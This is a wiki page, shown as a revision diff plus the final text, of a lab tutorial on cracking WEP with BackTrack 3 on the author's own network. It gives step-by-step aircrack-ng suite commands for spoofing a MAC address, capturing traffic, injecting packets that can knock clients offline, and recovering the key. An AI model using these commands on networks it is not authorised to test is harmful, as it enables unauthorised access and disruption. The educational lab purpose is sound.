Cracking WEP: Difference between revisions

From ITCwiki
Jump to navigation Jump to search
No edit summary
m (test edit)
 
(20 intermediate revisions by one other user not shown)
Line 1: Line 1:
==Introduction==
:'''Introduction to Cracking WEP using BackTrack 3''' -- ''By L. Yang.''
In this lab, I will show you how to crack WEP using BackTrack 3. As you may know, WEP is a week security protocol that can be broken easily. There are dozens of articles about cracking WEP on the internet, so if this article doesn’t give you enough information, please do some online researches. The purpose of this lab is not encouraged you to be a hacker. I set this lab for educational purpose and to prove that WEP is a weak protocol that can be hacked easily.
In this article, I will create a wireless network lab and show you how to crack a WEP key using BackTrack 3. As you may know, WEP, Wired Equivalent Privacy, is a week security protocol that can be broken or crack easily. There are dozens of articles about cracking WEP on the internet. If this article doesn’t give you enough information, please do some online researches to find more information and detail. The purpose of this lab is not encourage you to be a hacker. I write this article for educational purpose, and to prove that WEP is a weak security protocol that can be hacked easily.
==Hardware required==
 
===<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:110%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Hardware and Software Required</h2>===
Here is a list of equipment and hardware Requirement for this lab:
Here is a list of equipment and hardware Requirement for this lab:
*A wireless router - this could be any wireless router that supported WEP security encryption.
*A wireless router - this could be any wireless router that supported WEP security encryption.
*A BackTrack 3 Live CD  
*A BackTrack 3 Live CD  
*2 wireless adapters - one of them should be a compatible wireless adapter.
*2 wireless adapters - one of them should be a compatible wireless adapter.
*At least 2 PCs – In this lab, I used a desktop and a laptop. I installed the compatible wireless adapter card in the desktop, and the other laptop has a build-in wireless adapter.
*At least 2 PCs


==Setup the Wireless Lab==
===<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:110%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Preparing and Setting Up the Lab</h2>===
Below are the devices and hardware that I used in this lab along with the steps that I set them up for this lab.  
[[Image:topology.jpg|thumb|This is a picture of an idea for the network topology.|320px]]


*The wireless router: I used the Linksys wireless router (WRT54G) as the wireless access point. I setup the wireless router as shown in the snapshot bellow.
Below are the software and hardware I used in this lab. If you want to setup a lab like this, find the hardware and tools that are suitable for you. The picture on the right shows some information and idea of this network topology, and please be aware that the device names used in this lab are clearly addressed this picture


*The BackTrack 3 Live CD can be downloaded at http://www.backtrack-linux.org/downloads/. After the ISO image file has been downloaded, I burn it into a blank CD. If you would like instruction information of how to burn an ISO file to a CD/DVD, click on this link http://pcsupport.about.com/od/toolsofthetrade/ht/burnisofile.htm.
*I used the Linksys wireless router (WRT54G) as the wireless access point. I set it up as shown in the picture on the right.  


*Find a compatible wireless adapter from http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#compatibility. Find one and buy it or use the one that you have. The wireless adapter I used in this lab was the Alfa AWUS036H. I bought it online for $29.
*I download the BackTrack 3 Live CD image at http://www.backtrack-linux.org/downloads/. After the ISO image file has been downloaded, I burned the image into a blank CD. Instruction and information of how to burning a DVD/CD image to a DVD/CD can be found at http://pcsupport.about.com/od/toolsofthetrade/ht/burnisofile.htm.


*I inserted the Alfa AWUS036H wireless adapter into an USB port on my desktop and insert the BackTrack 3 Live CD into the CD ROM. I called this desktop the “Sniffing PC.” Boot the Sniffing PC from the CD.  
*I bought a wireless adapter online for $29. It was the Alfa AWUS036H. Compatibility wireless adapter can be found at http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#compatibility.  


*I made sure that the laptop (the Target PC) and the wireless router WRT54G (the Target AP) are configured and communicated with each other correctly.  
*The wireless adapter (Alfa AWUS036H) is connected through an USB port on my desktop PC and the BackTrack 3 Live CD is inserted into the CD ROM of the PC. I called this desktop PC the “Sniffing PC.


Here is the idea of the network topology of this lab and the screenshot of BackTrack 3.
*I made sure that the laptop (Target PC) and the wireless access point (the Target AP) are configured and communicated with each other correctly. I boot the Sniffing PC from the CD.  


[[File:bt00.jpg]]
{|
| [[Image:wrt54g.jpg|thumb|upright|Linksys wireless router(WRT54G)|202px]]
| [[Image:bt_screenshot.jpg|thumb|upright|A screenshot of BackTrack 3|230px]]
| [[Image:alfa.jpg|thumb|upright|Alfa AWUS036H|108px]]
|}


===<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:110%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Capturing Packets and Cracking the WEP</h2>===
[[Image:bt01.jpg|thumb|Selecting Wireless Assistant.|250px]]
Follow each section and step  below to check for a wireless adapter, capture data packets, and crack a WEP key using BackTrack 3.
====<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:90%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Checking Compatibility for an Adapter</h2>====
*In the Sniffing PC that is running BackTrack 3, select the '''K Menu''' icon located on the lower left hand corner. Then select '''Internet''', and then click on '''Wireless Assistant'''. When the '''Wireless Assistant''' window appear, you should see the target wireless access point that you want to hack. If you don’t have a compatible wireless adapter, it will prompt you an error massage says “No usable wireless device found.”
{|
| [[Image:bt02.jpg|thumb|upright|If the device is compatible|300px]]
| [[Image:bt03.jpg|thumb|upright|No usable wireless device found.|250px]]
|}


==Capturing packets and Cracking The WEP==
Take note some of the information such as the BSSID, the channel number, and the MAC address of the wireless access point that you want to crack. In this lab, the SSID is "TestingAP", channel 1, and the MAC address of 00:13:10:3C:51:5B. Close this window when you're done.


Follow the steps bellow to capture packets and crack the WEP key.  
*Run a '''Konsole''' terminal program. To run a '''Konsole''' terminal, click on the black screen icon that is located on the lower left hand corner next to the '''K Menu''' icon.
 
*In the '''Konsole''' terminal, enter the command below to fine your device interface name. When the name of your device interface name is shown, take note of the device interface name. My device interface name is wlan0, as shown in the snapshot on the right.  
*On the Sniffing PC, select the small '''K''' icon located on the lower left hand corner. Select '''Internet''' and then click on '''Wireless Assistant'''.
  airmon-ng
   
[[Image:bt04.jpg|thumb|Results of the commands.|250px]]
[[File:bt01.jpg]]
The device interface name of my adapter is '''wlan0'''.
====<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:90%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Generating A Faked MAC Address</h2>====
The purpose of four commands below is to generate a faked MAC Address for your wireless adapter. These commands are optional if you don't need to change the MAC Address of your adapter.


When the '''Wireless Assistant''' window appear, you should see the target wireless access point you want to hack as show in the snapshot bellow. If you don’t have a compatible wireless adapter, it will prompt you an error massage says “No usable wireless device found.
*Enter the 4 commands below by typing each command and press Enter key.
airmon-ng stop ''<your device Interface>''
ifconfig ''<your device Interface>'' down
macchanger --mac 00:11:22:33:44:55 ''<your device Interface>''
airmon-ng start ''<your device Interface>''
These commands will change the MAC Address of your wireless adapter to a faked MAC Address of 00:11:22:33:44:55.


[[File:bt02.jpg]] [[File:br03.jpg]]
All the result of the previous commands should look like the screenshot on the right.


Take note some of the information such as the BSSID, the channel number, and the MAC address of the wireless access point that you want to crack. In this lab, the SSID is Testing AR on channel 1, and MAC address is 00:13:10:3C:51:5B. When you done, close the Wireless Assistant window.
====<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:90%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Capturing Data Packets</h2>====
[[Image:bt05.jpg|thumb|List of wireless access points around you.|250px]]
*Run the command below to see a list of the wireless access points around you.  
airodump-ng ''<your device Interface>''


*Run Shell – Konsole window. It is a small black screen icon located on the lower left hand corner next to the small K icon.  
*Once you see the Target AP you want to crack, press Ctrl+C to stop the scanning process. On the device list, you should see information such as the MAC Address (BSSID), power level, channel, encryption protocol, and the name (ESSID) of each access point. Write down these informations of the wireless access point you are going to hack. The snapshot on the right shows a list of the wireless access points around me. My Target AP is the highlighted in red.


*Enter the command bellow to find the adapter name. Once the name of your wireless adapter shown, take note of the interface name. Mine is wlan0.  
[[Image:bt06.jpg|thumb|Capturing packets traffic.|250px]]


airmon-ng
*Run the command below. This command will capture the data traffic between the Target AP and any its wireless clients.


*Enter the 4 command lines bellow by typing each command line and press Enter key.  
airodump-ng -c ''<channel>'' -w ''<file name>'' --bssid ''<BSSID> <your device interface>''
'''Note:''' The '''channel''', '''BSSID''', and y'''our device interface''' are the informations that you have noted earlier. The file name can be any name you want, but you have to remember it. Here I used '''capfile''' as the file name. The command I used and the output is shown on the snapshot on the right.


airmon-ng stop ''(your device Interface)''
====<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:90%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Generating More Data Traffic</h2>====
ifconfig ''(your device Interface)'' down
The following two commands are used to attack and force the access point (Target AP) to inject data packets to increase data traffic on the network. However, when you are running these two commands, any client computer that is connecting to the access point may lose connection or unable to connect to the Internet. Sometime you may have to power-cycle the access point in order to get connection again. Some time you may have difficulty using these commands, and you may get some massage says that attacking was not successful. If you have difficulty using these commands during the steps below, just ignore it and continue working on the next step. (This section may be optional for someone.)
macchanger --mac 00:11:22:33:44:55 ''(your device Interface)''
airmon-ng start ''(your device Interface)''


The purpose of these command lines is to change the MAC Address of your wireless adapter to a fake MAC Address: 00:11:22:33:44:55.
*Open a new '''Konsole''' terminal. '''Important:''' Make sure to leave the previous commands running without closing the first '''Konsole''' terminal window.


All the result of the command lines above should look like this.
[[Image:bt07.jpg|thumb|Increasing traffic snapshot.|250px]]
*Enter the following command.
aireplay-ng -1 0 -a ''<BSSID>'' -h 00:11:22:33:44:55 -e ''<ESSID> <your device interface>''.
The '''BSSID''' is the MAC Address and the '''ESSID''' is the name of the access point. In this lab, I entered '''00:13:10:3C:51:5B''' as the BSSID and '''TestingAP''' as the ESSID.  


[[File:br04.jpg]]
*Enter the following command; this command will force the access point to inject packets and speed the process.
aireplay-ng -3 -b ''<BSSID>'' -h 00:11:22:33:44:55 ''<your interface name>''


*Run the command bellow to pick up your device and see a list of the wireless access points around you. Once you see the Target AP, press Ctrl+C to stop scanning. On the list, you will see information such as the MAC Address (BBSSID), power level, channel, encryption protocol, and the name (ESSID) of each device. Write down this information of the wireless access point that you are going to hack for later use. The Target AP used in this lab is the highlighted in the snapshot bellow.
The snapshot on the right shows the commands output of mine. If one of these two commands are not working properly for you, you will have to wait longer.  


airmon-ng ''(your device Interface)''
*Assuming that my laptop (Target PC) is running and connecting to the Internet through Target AP. Now, I am gong use my laptop, the Target PC, to watch a movie on youtube.com to create traffic on the network.


[[File:br05.jpg]]
====<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:90%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Cracking the WEP Key</h2>====
[[Image:bt08.jpg|thumb|thumb|upright|WEP cracking command output: KEY FOUND!|592px]]
This is the final and the actual step to crack the WEP key.
'''NOTE:'''You should wait until enough data packets has been captured before you run the cracking command below; otherwise it will not success. Check to see if you have enough data packets capture in the firs Konsole terminal; it is the number right below the #data column. You should wait until this number goes above 10000 or 20000 in order to successfully crack the WEP key.


*Run the command line bellow.  
*When you are ready, open the third Konsole teminal without closing the first two Konsole terminals. You should keep them open and running.  


airodump-ng -c (channel) -w (file name) --bssid (bssid) (your device interface)
* Enter the following command.
aircrack-ng -b ''<BSSID> <file name-01.cap>''
'''NOTE''': The file name is the file name you enter earlier, and don't forgot to type the file name follow by -01.cap, or you will get an error massage.
At this point, you should get the WEP key if you have captured enough data packets. The snapshot on the right is this command output for this lab. It says that the key is found.


The channel, bssid, and your device interface is the information that you noted above. The file name can be any name you want. This command line will capture the packets traffic between the Target AP and any wireless client, and save them in a file. The command line I used and the output is shown bellow.


[[File:br06.jpg]]
===<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:110%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Conclusion</h2>===
 
Cracking WEP is fairly easy. Even though I have little knowledge about using Linux and networking, I can crack a WEP key easily. Using Linux to crack WEP is more common than using Windows. That is because most of the software and tools needed to crack WEP are build-in within Linux Operating system, and there are more Linux supported wireless adapters available. If you want to crack a WEP for any reason, you should build your own lab. You should be aware that hacking others' network is illegal, so please don't try. This article is written for educational purpose, so I built my own lab and cracked my own network. It takes me a few days to write this article, but the actual time that it takes me to crack the WEP key is less than five minutes. The following steps and commands are what I actually have done to crack the WEP key in this lab.
*Now, I will use the second laptop (the Target PC) to watch some movies online on abc.com to generate more traffic between the Target AP and Target PC. Remember that the more packets traffic to the wireless access point, the more data you can capture, and the more likely you will successfully crack the key faster.
*'''Step 1'''. I opened a Konsole terminal and typed the following commands.
*Open a new Shell – Konsole windows and enter the command line bellow.
airmon-ng
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c 1 -w capfile --bssid 00:13:10:3C:51:5B wlan0
*'''Step 2'''. I opened another Konsole terminal and typed the following commands.
aireplay-ng -1 0 -a 00:13:10:3C:51:5B -e TestingAP wlan0
aireplay-ng -3 -b 00:13:10:3C:51:5B -h 00:11:22:33:44:55 wlan0
*'''Step 3'''. I opened another Konsole terminal and typed the following command.
aircrack-ng -b 00:13:10:3C:51:5B capfile-01.cap


aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (your device interface).
KEY FOUND!

Latest revision as of 00:30, 9 February 2011

Introduction to Cracking WEP using BackTrack 3 -- By L. Yang.

In this article, I will create a wireless network lab and show you how to crack a WEP key using BackTrack 3. As you may know, WEP, Wired Equivalent Privacy, is a week security protocol that can be broken or crack easily. There are dozens of articles about cracking WEP on the internet. If this article doesn’t give you enough information, please do some online researches to find more information and detail. The purpose of this lab is not encourage you to be a hacker. I write this article for educational purpose, and to prove that WEP is a weak security protocol that can be hacked easily.

Hardware and Software Required

Here is a list of equipment and hardware Requirement for this lab:

  • A wireless router - this could be any wireless router that supported WEP security encryption.
  • A BackTrack 3 Live CD
  • 2 wireless adapters - one of them should be a compatible wireless adapter.
  • At least 2 PCs

Preparing and Setting Up the Lab

This is a picture of an idea for the network topology.

Below are the software and hardware I used in this lab. If you want to setup a lab like this, find the hardware and tools that are suitable for you. The picture on the right shows some information and idea of this network topology, and please be aware that the device names used in this lab are clearly addressed this picture

  • I used the Linksys wireless router (WRT54G) as the wireless access point. I set it up as shown in the picture on the right.
  • The wireless adapter (Alfa AWUS036H) is connected through an USB port on my desktop PC and the BackTrack 3 Live CD is inserted into the CD ROM of the PC. I called this desktop PC the “Sniffing PC.”
  • I made sure that the laptop (Target PC) and the wireless access point (the Target AP) are configured and communicated with each other correctly. I boot the Sniffing PC from the CD.
Linksys wireless router(WRT54G)
A screenshot of BackTrack 3
Alfa AWUS036H

Capturing Packets and Cracking the WEP

Selecting Wireless Assistant.

Follow each section and step below to check for a wireless adapter, capture data packets, and crack a WEP key using BackTrack 3.

Checking Compatibility for an Adapter

  • In the Sniffing PC that is running BackTrack 3, select the K Menu icon located on the lower left hand corner. Then select Internet, and then click on Wireless Assistant. When the Wireless Assistant window appear, you should see the target wireless access point that you want to hack. If you don’t have a compatible wireless adapter, it will prompt you an error massage says “No usable wireless device found.”
If the device is compatible
No usable wireless device found.

Take note some of the information such as the BSSID, the channel number, and the MAC address of the wireless access point that you want to crack. In this lab, the SSID is "TestingAP", channel 1, and the MAC address of 00:13:10:3C:51:5B. Close this window when you're done.

  • Run a Konsole terminal program. To run a Konsole terminal, click on the black screen icon that is located on the lower left hand corner next to the K Menu icon.
  • In the Konsole terminal, enter the command below to fine your device interface name. When the name of your device interface name is shown, take note of the device interface name. My device interface name is wlan0, as shown in the snapshot on the right.
airmon-ng
Results of the commands.

The device interface name of my adapter is wlan0.

Generating A Faked MAC Address

The purpose of four commands below is to generate a faked MAC Address for your wireless adapter. These commands are optional if you don't need to change the MAC Address of your adapter.

  • Enter the 4 commands below by typing each command and press Enter key.
airmon-ng stop <your device Interface>
ifconfig <your device Interface> down
macchanger --mac 00:11:22:33:44:55 <your device Interface>
airmon-ng start <your device Interface>

These commands will change the MAC Address of your wireless adapter to a faked MAC Address of 00:11:22:33:44:55.

All the result of the previous commands should look like the screenshot on the right.

Capturing Data Packets

List of wireless access points around you.
  • Run the command below to see a list of the wireless access points around you.
airodump-ng <your device Interface> 
  • Once you see the Target AP you want to crack, press Ctrl+C to stop the scanning process. On the device list, you should see information such as the MAC Address (BSSID), power level, channel, encryption protocol, and the name (ESSID) of each access point. Write down these informations of the wireless access point you are going to hack. The snapshot on the right shows a list of the wireless access points around me. My Target AP is the highlighted in red.
Capturing packets traffic.
  • Run the command below. This command will capture the data traffic between the Target AP and any its wireless clients.
airodump-ng -c <channel> -w <file name> --bssid <BSSID> <your device interface>

Note: The channel, BSSID, and your device interface are the informations that you have noted earlier. The file name can be any name you want, but you have to remember it. Here I used capfile as the file name. The command I used and the output is shown on the snapshot on the right.

Generating More Data Traffic

The following two commands are used to attack and force the access point (Target AP) to inject data packets to increase data traffic on the network. However, when you are running these two commands, any client computer that is connecting to the access point may lose connection or unable to connect to the Internet. Sometime you may have to power-cycle the access point in order to get connection again. Some time you may have difficulty using these commands, and you may get some massage says that attacking was not successful. If you have difficulty using these commands during the steps below, just ignore it and continue working on the next step. (This section may be optional for someone.)

  • Open a new Konsole terminal. Important: Make sure to leave the previous commands running without closing the first Konsole terminal window.
Increasing traffic snapshot.
  • Enter the following command.
aireplay-ng -1 0 -a <BSSID> -h 00:11:22:33:44:55 -e <ESSID> <your device interface>.

The BSSID is the MAC Address and the ESSID is the name of the access point. In this lab, I entered 00:13:10:3C:51:5B as the BSSID and TestingAP as the ESSID.

  • Enter the following command; this command will force the access point to inject packets and speed the process.
aireplay-ng -3 -b <BSSID> -h 00:11:22:33:44:55 <your interface name>

The snapshot on the right shows the commands output of mine. If one of these two commands are not working properly for you, you will have to wait longer.

  • Assuming that my laptop (Target PC) is running and connecting to the Internet through Target AP. Now, I am gong use my laptop, the Target PC, to watch a movie on youtube.com to create traffic on the network.

Cracking the WEP Key

WEP cracking command output: KEY FOUND!

This is the final and the actual step to crack the WEP key. NOTE:You should wait until enough data packets has been captured before you run the cracking command below; otherwise it will not success. Check to see if you have enough data packets capture in the firs Konsole terminal; it is the number right below the #data column. You should wait until this number goes above 10000 or 20000 in order to successfully crack the WEP key.

  • When you are ready, open the third Konsole teminal without closing the first two Konsole terminals. You should keep them open and running.
  • Enter the following command.
aircrack-ng -b <BSSID> <file name-01.cap>

NOTE: The file name is the file name you enter earlier, and don't forgot to type the file name follow by -01.cap, or you will get an error massage. At this point, you should get the WEP key if you have captured enough data packets. The snapshot on the right is this command output for this lab. It says that the key is found.


Conclusion

Cracking WEP is fairly easy. Even though I have little knowledge about using Linux and networking, I can crack a WEP key easily. Using Linux to crack WEP is more common than using Windows. That is because most of the software and tools needed to crack WEP are build-in within Linux Operating system, and there are more Linux supported wireless adapters available. If you want to crack a WEP for any reason, you should build your own lab. You should be aware that hacking others' network is illegal, so please don't try. This article is written for educational purpose, so I built my own lab and cracked my own network. It takes me a few days to write this article, but the actual time that it takes me to crack the WEP key is less than five minutes. The following steps and commands are what I actually have done to crack the WEP key in this lab.

  • Step 1. I opened a Konsole terminal and typed the following commands.
airmon-ng
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c 1 -w capfile --bssid 00:13:10:3C:51:5B wlan0
  • Step 2. I opened another Konsole terminal and typed the following commands.
aireplay-ng -1 0 -a 00:13:10:3C:51:5B -e TestingAP wlan0
aireplay-ng -3 -b 00:13:10:3C:51:5B -h 00:11:22:33:44:55 wlan0
  • Step 3. I opened another Konsole terminal and typed the following command.
aircrack-ng -b 00:13:10:3C:51:5B capfile-01.cap

KEY FOUND!